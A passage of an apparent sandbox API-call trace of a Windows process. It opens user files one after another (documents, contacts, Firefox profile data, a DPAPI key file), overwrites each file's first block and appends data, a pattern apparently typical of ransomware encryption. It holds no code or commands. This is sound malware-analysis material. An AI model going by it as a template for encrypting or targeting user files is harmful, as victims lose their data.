lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0187.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kZ82v-FlR5BH2izf.mkv", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kZ82v-FlR5BH2izf.mkv", lpUsedDefaultChar=0x0) returned 20 [0187.148] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.149] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x337e [0187.149] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.149] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x337e [0187.149] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.150] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.150] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0187.150] CloseHandle (hObject=0x1cc) returned 1 [0187.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.151] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.151] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1d4 [0187.151] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.151] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.152] ReleaseMutex (hMutex=0x168) returned 1 [0187.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0e15476d-d8fe-46ca-8099-ebdcf80f637c", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0187.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0e15476d-d8fe-46ca-8099-ebdcf80f637c", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpUsedDefaultChar=0x0) returned 36 [0187.152] ReadFile (in: hFile=0x1cc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0187.153] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0187.153] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x75c, lpOverlapped=0x0) returned 1 [0187.153] CloseHandle (hObject=0x1cc) returned 1 [0187.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.154] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.154] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa [0187.154] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.154] ReleaseMutex (hMutex=0x168) returned 1 [0187.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InstallTime20131025151332", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0187.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InstallTime20131025151332", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InstallTime20131025151332", lpUsedDefaultChar=0x0) returned 25 [0187.154] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f7a9f8, nNumberOfBytesToRead=0xa, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f7a9f8*, lpNumberOfBytesRead=0x2e9f2bc*=0xa, lpOverlapped=0x0) returned 1 [0187.155] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0187.155] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x592, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x592, lpOverlapped=0x0) returned 1 [0187.156] CloseHandle (hObject=0x1cc) returned 1 [0187.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.156] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.156] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe14 [0187.156] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.157] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.157] ReleaseMutex (hMutex=0x168) returned 1 [0187.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pluginreg.dat", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0187.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pluginreg.dat", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pluginreg.dat", lpUsedDefaultChar=0x0) returned 13 [0187.157] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xe14, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f2bc*=0xe14, lpOverlapped=0x0) returned 1 [0187.194] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0187.194] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e92278*, nNumberOfBytesToWrite=0x139c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesWritten=0x2e9f2d0*=0x139c, lpOverlapped=0x0) returned 1 [0187.195] CloseHandle (hObject=0x1cc) returned 1 [0187.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qFbZHz9T9B.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qfbzhz9t9b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.196] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.196] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x185bd [0187.196] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.196] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.196] ReleaseMutex (hMutex=0x168) returned 1 [0187.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qFbZHz9T9B.gif", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0187.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qFbZHz9T9B.gif", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qFbZHz9T9B.gif", lpUsedDefaultChar=0x0) returned 14 [0187.196] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0187.197] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x175bd [0187.197] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.198] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x175bd [0187.201] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.201] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.201] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0187.201] CloseHandle (hObject=0x1cc) returned 1 [0187.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.204] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.204] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x49a [0187.205] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.205] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.205] ReleaseMutex (hMutex=0x168) returned 1 [0187.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aclviho ASldjfl.contact", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0187.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aclviho ASldjfl.contact", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aclviho ASldjfl.contact", lpUsedDefaultChar=0x0) returned 23 [0187.205] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2e9f2bc*=0x49a, lpOverlapped=0x0) returned 1 [0187.211] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0187.211] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa22, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa22, lpOverlapped=0x0) returned 1 [0187.211] CloseHandle (hObject=0x1cc) returned 1 [0187.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9XTjBi3NdIYJ8Mlh8E.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9xtjbi3ndiyj8mlh8e.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.212] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.213] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xbbf5 [0187.213] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.213] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.213] ReleaseMutex (hMutex=0x168) returned 1 [0187.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9XTjBi3NdIYJ8Mlh8E.pptx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0187.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9XTjBi3NdIYJ8Mlh8E.pptx", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9XTjBi3NdIYJ8Mlh8E.pptx", lpUsedDefaultChar=0x0) returned 23 [0187.213] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0187.214] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xabf5 [0187.214] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.215] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xabf5 [0187.215] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.215] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.216] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0187.216] CloseHandle (hObject=0x1cc) returned 1 [0187.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JtueLjk.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jtueljk.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.217] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.217] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x107d3 [0187.217] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.217] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.217] ReleaseMutex (hMutex=0x168) returned 1 [0187.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JtueLjk.ppt", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JtueLjk.ppt", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JtueLjk.ppt", lpUsedDefaultChar=0x0) returned 11 [0187.217] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0187.218] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xf7d3 [0187.218] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.219] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xf7d3 [0187.219] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.219] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.219] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0187.219] CloseHandle (hObject=0x1cc) returned 1 [0187.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\K732K-ewYm.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\k732k-ewym.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.220] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.220] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xf72b [0187.220] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.221] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.221] ReleaseMutex (hMutex=0x168) returned 1 [0187.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="K732K-ewYm.pptx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0187.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="K732K-ewYm.pptx", cchWideChar=15, lpMultiByteStr=0x1f7346c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="K732K-ewYm.pptx", lpUsedDefaultChar=0x0) returned 15 [0187.221] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0187.222] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xe72b [0187.222] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.222] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xe72b [0187.222] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.223] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: 